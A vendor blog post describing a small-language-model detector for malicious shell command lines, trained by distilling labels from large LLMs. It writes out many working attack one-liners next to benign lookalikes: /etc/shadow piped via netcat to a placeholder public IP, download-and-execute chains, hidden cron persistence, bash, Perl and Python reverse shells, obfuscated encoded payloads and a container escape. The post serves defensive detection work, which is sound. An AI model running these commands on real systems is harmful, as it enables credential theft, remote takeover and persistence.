Skip to main content
dnadamson
Staff
Staff
March 10, 2026

AI-Based Detection of Malicious Command Lines via Knowledge Distillation

  • March 10, 2026
  • 1 reply
  • 563 views

AI-Based Detection of Malicious Commands

 

Recently, we released a new AI model as part of our FortiCNAPP product to further improve the resilience of our intrusion detection capability. The Anomalous Host Command detection uses small language models to identify shell command line strings that:

  • differ significantly from those previously executed in the environment, and
  • exhibit characteristics that are suggestive of malicious activity.

This model contributes signals to FortiCNAPP Composite Alerts and makes our platform more robust to attempts to evade detection.

 

 

Why Shell Commands?

 

Reliable intrusion detection integrates signals from numerous data sources to distinguish malicious activity from benign background noise. Process data, including the command line string associated with each process, is one of the more valuable data sources we analyze. This command line data is so valuable because it has the potential to provide strong evidence of malicious intent. At the same time, because there are many ways to compose a command line that would accomplish the same task, there are many ways for a command line author to hide their intent.

 

The signals that reveal malicious intent vary widely in strength and subtlety. Some are obvious, for example: invoking known exploit software or establishing a reverse shell. Others are weaker on their own but meaningful in combination: the use of fallback execution chains, execution from world-writable directories, suppressing output, connecting to raw public IP addresses, or encoding payloads.

 

In order to demonstrate the complexity of identifying malicious commands, we present several classes of malicious commands below and compare them to similar benign examples.

 

Example Shell Commands

 

Known Intrusive Software

In the simplest cases, command line strings can reveal an intrusion through the invocation of known exploit software. Tools like kinsing, Responder.py, and hydra, among innumerable others, have few to no use cases beyond malicious exploitation or penetration testing. As such, the presence of these strings in command lines is an obvious signal of an intrusion in progress, either by attackers or by a red team.

 

Known Intrusive Software Examples:

curl -o /tmp/kinsing http://<PUBLIC_IP>/kinsing
sudo python Responder.py -I eth0
hydra -L users.txt -P passwords.txt -t 4 -f ftp://<PUBLIC_IP>

 

Living off the Land

Because of the simplicity of detecting known exploit tools, sophisticated attackers avoid using them. Instead they often resort to using tools that are both commonly available on target machines and are widely used for benign purposes. This practice is referred to as Living-off-the-Land (LotL). By leveraging these dual-use utilities, known as LOLBins, an attacker can blend in with standard administrative activity and bypass simpler detection schemes.

 

Dual Use Example 1: Can you tell which command is likely malicious?

cat /etc/shadow | nc <PUBLIC_IP> 4444​
cat /var/log/syslog | nc <PRIVATE_IP> 514​
Spoiler
Dual Use Example 1: Both of the following commands send the contents of a file to another machine using nc (netcat). Structurally, the commands are almost identical, but the first command is far more suspicious. This is because /etc/shadow contains highly sensitive password hash data, and the command sends it to a public internet address on an arbitrary port. In contrast, the second command sends less sensitive log data (/var/log/syslog) to an internal system using a port commonly associated with logging. Small differences in the file being accessed and the destination of the network connection can therefore make a command appear benign or highly suspicious.

Malicious

cat /etc/shadow | nc <PUBLIC_IP> 4444​

Benign

cat /var/log/syslog | nc <PRIVATE_IP> 514​​

 

Dual Use Example 2: Can you tell which command is likely malicious?

curl -fsSL https://deb.nodesource.com/setup_lts.x | bash -
/bin/sh -c curl -o /tmp/update http://<PUBLIC_IP>:8000/update && chmod 777 /tmp/update && /tmp/update
Spoiler
Dual Use Example 2: Both of the following commands involve downloading and executing software. The first command is suspicious because it downloads a file from a hard-coded public IP address, stores it in the world-writable /tmp directory using a generic filename, gives it overly permissive execution rights, and immediately executes it. In contrast, the second command shows a legitimate software installation workflow using a trusted vendor distribution endpoint. Enterprise software is often installed using vendor-provided bootstrap scripts from well-known domains rather than arbitrary hosts. Even though the pipe to bash itself might not follow the best security best practices, it is common.

Malicious
/bin/sh -c curl -o /tmp/update http://<PUBLIC_IP>:8000/update && chmod 777 /tmp/update && /tmp/update
Benign
curl -fsSL https://deb.nodesource.com/setup_lts.x | bash -

 

Dual Use Example 3: Can you tell which command is likely malicious?

/bin/sh -c "echo '* * * * * /tmp/.update.sh >/dev/null 2>&1' | crontab -"
/bin/sh -c "echo '0 2 * * * /usr/local/bin/daily-backup.sh' | crontab -"
Spoiler
Dual Use Example 3: Both of the following commands schedule recurring tasks using cron, but they differ in intent and risk indicators. The first command is more suspicious because it schedules a script located in the /tmp directory, uses a hidden file name (.update.sh), and suppresses all output by redirecting messages to /dev/null.  The once per minute execution frequency is also quite aggressive. This combination of behaviors is commonly associated with persistence mechanisms that attempt to hide activity from system logs and administrators. In contrast, the second command represents a typical system maintenance workflow, scheduling a backup task to run once per day using a clearly named script stored in a standard system directory. The difference between these commands illustrates how small changes in file location, naming conventions, execution frequency, and logging behavior can significantly change how a command is interpreted from a security perspective.

Malicious
/bin/sh -c "echo '* * * * * /tmp/.update.sh >/dev/null 2>&1' | crontab -"​
Benign
/bin/sh -c "echo '0 2 * * * /usr/local/bin/daily-backup.sh' | crontab -"​

 

Reverse Shell

One of the clearest signals of compromise on a machine is a reverse shell command, that is, if you can recognize it. A reverse shell is a command that opens up interactive shell access on one machine to a second remote machine on the internet and can work even when the machine running the command is not normally internet routable. Since the legitimate use cases for setting up an interactive shell in this way are slim to none, it is a high-confidence signal that an intrusion or penetration test is in progress. Even though this strategy is known to be a high confidence signal of an intrusion, the wide variety of ways in which a reverse shell can be achieved means that detecting this strategy with high precision and recall is non-trivial. Some very different looking examples of reverse shell commands are shown below.

 

Reverse Shell Example 1: Can you tell which command sets up a reverse shell?

nc -e /bin/sh <PUBLIC_IP> 443
nc -zv database.internal.corp 5432
Spoiler
Reverse Shell Example 1: Both of the following commands use nc (netcat), a general-purpose networking utility commonly found on Linux systems. The first command uses the -e flag to attach an interactive shell to an outbound connection on port 443 (the standard HTTPS port) effectively establishing a reverse shell that could blend in with normal web traffic. The second is a routine connectivity check. The -zv flags tell netcat to scan a port without sending data and print verbose output. System administrators and health check scripts frequently use netcat this way to verify that internal services are reachable. The presence of -e with a shell path is the critical distinguishing detail, but not all versions of netcat even support -e, leading attackers to use alternative reverse shell commands that are  harder to signature.

Malicious
nc -e /bin/sh <PUBLIC_IP> 443​

Benign

nc -zv database.internal.corp 5432​

 

Reverse Shell Example 2: Can you tell which command sets up a reverse shell?

bash -c 'exec 3<>/dev/tcp/vault.internal.corp/8200 && echo -e "GET /v1/sys/health HTTP/1.1\r\nHost: vault\r\n\r\n" >&3 && cat <&3'​
bash -c 0<&189-;exec 189<>/dev/tcp/<PUBLIC_IP>/4444;sh <&189 >&189 2>&189
Spoiler
Reverse Shell Example 2: Both of the following commands use bash's built-in /dev/tcp pseudo-device to open a TCP connection via file descriptor redirection. The first opens a connection to a public IP and redirects stdin, stdout, and stderr through it to an interactive shell: a classic reverse shell that uses no external binaries and thus evades tools that monitor process execution. The second uses the same /dev/tcp mechanism to perform a lightweight HTTP health check against an internal Vault service, a pattern sometimes used in shell scripts where curl is unavailable. The underlying mechanics are nearly identical: open a socket, redirect I/O through a file descriptor. The difference lies in whether the connection target is an attacker-controlled host and whether an interactive shell is attached to the other end.

Malicious
bash -c 0<&189-;exec 189<>/dev/tcp/<PUBLIC_IP>/4444;sh <&189 >&189 2>&189

Benign

bash -c 'exec 3<>/dev/tcp/vault.internal.corp/8200 && echo -e "GET /v1/sys/health HTTP/1.1\r\nHost: vault\r\n\r\n" >&3 && cat <&3'​

 

Reverse Shell Example 3: Can you tell which command sets up a reverse shell?

perl -e 'use Socket;$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p,INADDR_ANY));listen(S,5);print "Listening on port $p\n";accept(C,S);print C "OK\n";close(C);'
sudo perl -e 'use Socket;$i="<PUBLIC_IP>";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");$s="/bi"."n/s"."h";exec("$s -i");};'
Spoiler
Reverse Shell Example 3: Both of the following commands are Perl one-liners that import the Socket module and use low-level socket system calls. The first opens an outbound connection to an attacker IP, redirects all three standard file descriptors to the socket, and spawns an interactive shell. This gives the remote party full remote code execution capability. The second uses the same Socket primitives but binds a simple local listener that accepts a connection and responds with a status message, a pattern seen in ad-hoc testing or quick-and-dirty service stubs. Both involve inline Perl executed with -e, and both manipulate sockets directly. The key differentiator is the obscured exec call that spawns an interactive shell combined with STDIN/STDOUT/STDERR redirection to a remote host. That combination is the signature of a reverse shell, but spotting it requires parsing the semantics of the command, not just its surface syntax.

Malicious
sudo perl -e 'use Socket;$i="<PUBLIC_IP>";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");$s="/bi"."n/s"."h";exec("$s -i");};'​

Benign

perl -e 'use Socket;$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p,INADDR_ANY));listen(S,5);print "Listening on port $p\n";accept(C,S);print C "OK\n";close(C);'

 

Layers of Obfuscation

To better evade detection, attackers will also obfuscate the intent of their commands in various ways. Attackers may encode the command in base64, hexadecimal or any number of other schemes that are likely to be decodable by the target host. They may also fragment tool names, URLs, and other identifiable tokens across variables to remove searchable substrings from the command. Additionally, attackers may include a lot of extraneous content to throw off detection tools, including wrapping their actual command within other more benign-looking commands.

 

Obfuscation Example 1: Can you tell which command is likely malicious?

echo $KUBECONFIG_B64 | base64 -d > ~/.kube/config
sh -c echo <BASE64_STRING> | base64 -d | bash
Spoiler
Obfuscation Example 1: Both of the following commands pipe base64-encoded content through base64 -d to decode it. The first decodes a hidden payload and pipes the result directly into bash for execution. In that case, the base64 encoding serves no purpose other than to disguise the actual commands being run from static analysis and human review. The second decodes a Kubernetes configuration file and writes it to disk, a common pattern in CI/CD pipelines where structured data containing special characters is stored as base64 in environment variables. Both commands look similar at a glance: echo, a base64 value, and base64 -d. The critical difference is the destination. Piping to bash means the decoded content will be executed as code, while redirecting to ~/.kube/config simply writes data to a file.

Malicious
sh -c echo <BASE64_STRING> | base64 -d | bash

Benign

echo $KUBECONFIG_B64 | base64 -d > ~/.kube/config

 

Obfuscation Example 2: Can you tell which command is likely malicious?

/usr/bin/git archive --format=zip --prefix=vE --exec=`perl -e 'system(pack(qq,H152,,qq,<HEX_STRING>,))'` --remote=fcqKwlA/ --​
/usr/bin/git archive --format=zip --prefix=release-v2.1/ --exec=/usr/local/bin/git-upload-archive --remote=git@gitlab.internal.corp:platform/api.git HEAD
Spoiler
Obfuscation Example 2: Both of the following commands invoke git archive to create a zip archive from a remote repository. The first abuses the --exec flag (which normally specifies the path to git-upload-archive on the remote end) to inject a Perl one-liner that decodes and executes a hex-encoded payload. The second uses --exec as intended, pointing to a git-upload-archive binary installed in a non-standard location. Both commands are long, complex, and use the same flags. The malicious intent is buried inside a backtick-evaluated Perl expression within a single flag value, making it easy to miss during manual review or simple pattern matching.

Malicious
/usr/bin/git archive --format=zip --prefix=vE --exec=`perl -e 'system(pack(qq,H152,,qq,<HEX_STRING>,))'` --remote=fcqKwlA/ --​

Benign

/usr/bin/git archive --format=zip --prefix=release-v2.1/ --exec=/usr/local/bin/git-upload-archive --remote=git@gitlab.internal.corp:platform/api.git HEAD

 

Obfuscation Example 3: Can you tell which command is likely malicious?

p=http; h=<PUBLIC_IP>; c=cu; c=${c}rl; s=s; s=${s}h; $c -fsSL $p://$h/x | $s
curl -fsSL $GITHUB_API_URL | jq -r '.tag_name'
Spoiler
Obfuscation Example 3: Both of the following commands use curl to fetch content from a remote URL and pipe the result to another program, though in the first case this is far from obvious. The first fragments every meaningful token (i.e. the tool name, protocol, host, and even the shell invocation) across multiple variables that are reassembled at execution time. Neither curl, http://, the target URL, nor sh appear as contiguous strings anywhere in the command, rendering simple pattern matching and keyword-based detection effectively useless. The second also uses a variable for the URL, a routine practice in CI/CD environments where configuration is injected through environment variables, and pipes the response to jq for JSON parsing. Both commands leverage shell variables to resolve key values at runtime, but the first does so deliberately to fragment identifiable tokens and evade string-based detection, while the second does so as a natural consequence of how deployment pipelines are configured.

Malicious
p=http; h=<PUBLIC_IP>; c=cu; c=${c}rl; s=s; s=${s}h; $c -fsSL $p://$h/x | $s​

Benign

curl -fsSL $GITHUB_API_URL | jq -r '.tag_name'​

 

These examples represent just a small fraction of the possible strategies that attackers employ when executing shell commands.

 

 

Why AI?

 

As we have seen from the above examples, recognizing the signals of malicious intent within command line strings is a complex challenge. The differences between benign commands and malicious ones can be subtle. Additionally, because command line strings are effectively miniature programs, robust detection of malicious intent requires holistic and semantic reasoning. While regex and basic pattern matching can flag more obvious examples, sophisticated attackers easily bypass these static filters through obfuscation and aliasing.

 

In contrast, transformer models (the same class of neural network architecture behind large language models like ChatGPT) are designed to process sequences of tokens and learn which parts of a sequence are most relevant to each other. A transformer doesn't evaluate each word or flag in isolation. Instead, it builds a representation of the entire command that captures how its components relate to one another. This means it can learn, for example, that curl followed by a pipe to sh with a raw IP address carries different intent than curl followed by a pipe to jq with an environment variable. This capacity for contextual reasoning across an entire sequence is what makes transformers well suited to distinguishing malicious commands from benign ones, where the difference often comes down to the combination of elements rather than any single keyword or substring. 

 

By leveraging transformer-based models, we can harden our intrusion detection capability, making it more robust to evasion by capturing the long-range associations and structural logic that define truly malicious behavior. Indeed, the act of obfuscation itself, in its innumerable permutations, can become the signal of malicious intent. Having established that transformer-based models are well suited to the task, the question becomes how to deploy them at scale without prohibitive cost.

 

 

Scalability & Cost Effectiveness

 

In an enterprise environment, the ensemble of monitored hosts can easily generate millions if not billions of process execution events per day, even after reasonable filtering. Since genuine intrusions and even penetration tests are comparatively rare events, the vast majority of these commands will reflect routine or at least benign activities. That means that recognizing malicious commands when they are executed is not only challenging because of the subtlety of the differences involved (as described above), but also because of the extreme scale of the datasets.

 

While we described above how the complexity of the signal justifies the use of transformer-based models for detection, we must also find a way to leverage that technology in a scalable fashion. By one back-of-the-envelope calculation, even after filtering and fuzzy deduplication, analyzing command line data using large language models (LLMs) like those available from OpenAI or Anthropic could easily amount to hundreds of thousands of dollars per year per FortiCNAPP customer. This is extremely cost prohibitive, particularly as interpreting command line data is just a single form of analysis among many. In order to make the application of AI practical in this case, the cost must be reduced by several orders of magnitude. Fortunately, by leveraging a model that is >10000x smaller than today’s modern LLMs we can reduce the cost of inference by roughly that same factor.

 

 

Knowledge Distillation

 

Until recently, training small models for targeted tasks like suspicious command line detection was difficult due to the lack of sufficient volumes of high-quality data that was well labeled for the task. Now, however, the large language models (which are very effective at classifying command line data as malicious or not) can be used to generate training corpora for small language models (SLMs). In this way, the LLMs can be thought of as the “teacher” models and the SLMs can be thought of as the “student” models. The process of using an LLM to “teach” a SLM to perform a specific task is referred to as Knowledge Distillation, because one is effectively “distilling” the understanding of a specific domain out of the general purpose model.

 

In practice, we used a multi-stage prompting pipeline to generate our training corpus. First, the LLM was prompted to enumerate high level classes of malicious and benign commands. For each class, the LLM was then prompted to generate example commands, and finally to produce structurally similar pairs (one benign, one malicious) based on those individual examples to help the student model learn the discrimination boundary within each class. To prevent high-entropy tokens like IP addresses, long hex strings, and large integers from dominating the learned representations, we applied normalization to replace these elements with pre-defined placeholders before training. Regex pre-processing identifies and replaces these elements in command line strings during inference. The resulting student model has on the order of 10 million parameters, which is roughly 100,000 times smaller than the LLMs used to generate its training data.

 

KnowledgeDistillationDiagram.png

Multi-Stage prompting & fine-tuning pipeline.

 

 

Anomalous ∩ Suspicious

 

We have a lot of experience with intrusion detection, and one of the key insights we have learned is the benefit of looking for signals that are both anomalous and have security relevance. Looking at anomalous signals alone will surface a lot of obviously benign content. Looking at “suspicious” signals alone will often catch recurring false-positives where customer code may be doing something against best practices that looks sketchy but really is not. Higher fidelity detections are produced by looking for signals that exhibit anomalous and suspicious traits.

 

Following this paradigm, we designed our command line string models to produce two outputs. One which quantifies suspicion score between 0 and 1, and the other which provides an embedding vector that can be used for similarity comparisons with previously seen commands. If a command is sufficiently dissimilar from previously seen commands and has a high enough suspicion score, then an Observation (and potentially also a Composite Alert) is produced.

 

 

VennDiagram.png

We trigger only on signals that are both anomalous and suspicious.

 

 

What Does This Look Like?

 

As a visual person, I find it easier to wrap my head around new concepts when I can represent them visually. To build intuition for what our model has learned, we can visualize how it represents different commands. Our model converts each command line string into a high-dimensional numerical vector: essentially a list of hundreds of numbers that encodes the model's understanding of that command's meaning and intent. Commands that the model considers similar will have vectors that are “closer together” in this high dimensional space and commands it considers different will have vectors that are “farther apart.” The challenge is that humans can't visualize hundreds of dimensions, so we use a technique called UMAP (Uniform Manifold Approximation and Projection) to compress these vectors down to two dimensions that we can chart on a scatter plot. While this compression inevitably loses some information, it preserves the relative neighborhood structure: commands that were close together in the model's high-dimensional space will tend to remain close together on the two dimensional plot.

 

To generate these plots, we took tens of thousands of real-world commands sampled from customer environments and combined them with LLM-generated commands, both benign and malicious, labeled by type. The gray points that form the background of each plot represent the benign real-world commands. In other words, that is the "noise" that a detector must sift through. In the first plot, we overlay several categories of malicious commands in color. Notice that they roughly cluster together toward one region of the space, suggesting that the model has learned a representation in which malicious commands share common characteristics that separate them from the majority of the benign background.

 

MaliciousCommands-17-BEST.png

UMAP plot of example malicious commands. Each point represents a single command, positioned based on the model's learned similarity. Commands the model interprets as similar appear closer together. Malicious command categories (colored) cluster toward the upper edge of the benign background (gray), with notable overlap between categories.

 

In the four plots that follow, we color-code selected categories of benign commands individually to show how the model organizes them. Commands related to container management and infrastructure-as-code occupy different regions than those related to file operations or networking. It is the latter two categories that co-mingle the most with the distribution of malicious commands, and this makes intuitive sense given that malicious commands often involve file manipulation and network connections.

 

Benign-ContainerManagement-Green.png

Container management commands (green) concentrate in a distinct region at the lower right, well separated from the malicious cluster.

 

Benign-InfrastructureAsCode-Red.png

Infrastructure-as-code commands (red) occupy the lower right and periphery, largely distinct from the malicious region.

 

Benign-FileOperations-Purple.png

File operation commands (purple) spread broadly across the space, overlapping somewhat with the regions where malicious

commands cluster.

 

Benign-NetworkingAndConnectivity-Orange.png

Networking commands (orange) spread widely and extend into the upper region where malicious commands are concentrated, reflecting the structural similarity between benign network operations and malicious network-based techniques.

 

All told, while it is difficult to compress the high-dimensional representation of our model down to two dimensions for visualization, UMAP still allows us to peek into the operation of the model and see what kinds of commands are most obviously different and where the subtleties arise. Being able to see reasonable differences on a UMAP plot, however, in no way proves the utility of the model. For that, we turn to more rigorous testing.

 

 

Validation Through Discovery

 

Before we released our Anomalous Host Command detection model, FortiCNAPP already included a large ensemble of high-precision detections to identify malicious processes based on their metadata. Our goal with this model was to significantly broaden the recall of our malicious process detection to catch previously unseen intrusive commands. Further, we wanted to accomplish this while also keeping our overall rate of detection low, thus preventing alert fatigue.

 

The improved recall of the Anomalous Host Command model has been demonstrated through the previously unseen malicious commands it has detected. Before the release of our model, we used it to scan data from previously identified intrusions. In those experiments, we identified dozens of malicious commands that our existing rule-based detection logic missed. Since the deployment of the Anomalous Host Command detection, we continue to find new signs of intrusion on an almost daily basis, including more comprehensive detection of penetration test activities than was previously achieved. A small selection of the commands that our small language model has recently surfaced are shown below. Notably, some of the commands surfaced by the model match patterns we described earlier in this article, validating that the model has learned to recognize these strategies.

 

Python reverse shell:

python -c a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("<REDACTED_IP>",4444));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")

 

Container escape and host takeover:

./docker run -it -v /:/host --privileged osexp2000/ubuntu-with-utils

 

C2 attack script with keep-alive:

/bin/sh -c /tmp/attack '{"port": "4444", "ip": "<REDACTED_IP>", "procedure": "bash196"}' && tail -f /dev/null

 

Malicious payload obfuscation with privilege escalation:

sudo -u root -H -- /usr/bin/python -c import codecs,os,sys;_=codecs.decode;exec(_(_("<REDACTED_PAYLOAD>".encode(),"base64"),"zip"))

 

Suspicious download and execute:

/bin/sh -c wget http://<REDACTED_PUBLIC_IP>:8000/tmp && chmod 777 tmp && ./tmp

 

While the Anomalous Host Command model has made our ability to detect malicious commands more robust, it has also done so with strong precision. The production version of our Anomalous Host Command model flags fewer than one command in a million as worthy of examination.

 

Having demonstrated that the Anomalous Host Command model detects a broader spectrum of suspicious behaviors than was previously achievable, we now move on to how these detections are presented within the FortiCNAPP product.

 

Triaging Anomalous Host Commands

 

The Anomalous Host Command detection contributes to Composite Alerts. As such it will appear in the Observation Timeline and the Intrusion Graph of Composite Alerts where it has been triggered. Because details about the process in question are so important to triaging these detections, we have taken steps to enrich each 'anomalous' process with command line data for its parent processes up to five levels. That information can be seen by clicking on the “ran anomalous process” edge in the Intrusion Graph.

 

ClickOnRanAnomalousProcessHighRes.png

Intrusion Graph from a FortiCNAPP Composite Alert with the 'ran anomalous process' edge selected.

 

Clicking on the "ran anomalous process" edge allows you to select any individual anomalous process and view the command lines of the parent commands. In this example, the reverse shell command line string is in itself alarming, but the fact that the parent process is gunicorn (a webserver) adds clarity to how the reverse shell was executed. A vulnerability in the webserver was exploited to gain access to the host.

 

ExampleParentCommandLinesHighRes.png

Detail panel for a selected process. The command line strings for the parent processes of the reverse shell command are visible. In this case they show the command was executed by a webserver.

 

While these details are all available for manual investigation through the UI, the most efficient way of triaging all Composite Alerts is through the FortiCNAPP AI Assistant. The AI Assistant is available for all Composite Alerts and is accessible on the right hand side of the screen. The AI Assistant will take all of the evidence compiled as part of a Composite Alert into account when assessing the likelihood of a compromise and the recommended next steps. Because Composite Alerts automatically enrich any anomalous host commands with (1) the command line strings of parent processes and (2) any other detections that have triggered for associated machines around the same time, the AI Assistant will have good context in order to help triage the alert.

 

Conclusion

 

Detecting malicious commands in a sea of benign process activity is a challenge that spans semantic complexity, adversarial evasion, and extreme scale. As we have shown, the differences between a malicious command and a benign one can be extremely subtle, and attackers actively exploit that subtlety. Rule-based detection, while valuable for known patterns, cannot keep pace with the combinatorial variety of techniques available to a motivated adversary. By applying transformer-based models trained through knowledge distillation, we gain many of the semantic reasoning capabilities of large language models at a fraction of the cost. That enables us to analyze millions of commands per day and surface novel malicious behavior that static rules miss. Since deployment, the Anomalous Host Command model has regularly uncovered previously undetected signs of intrusion, validating the approach in practice. As attacker techniques continue to evolve, so too will our models, and we look forward to refining this capability based on what it continues to find.

 

1 reply

alissonfreire
Staff
Staff
March 10, 2026

This is a very detailed and informative article. Great job, and thank you for sharing!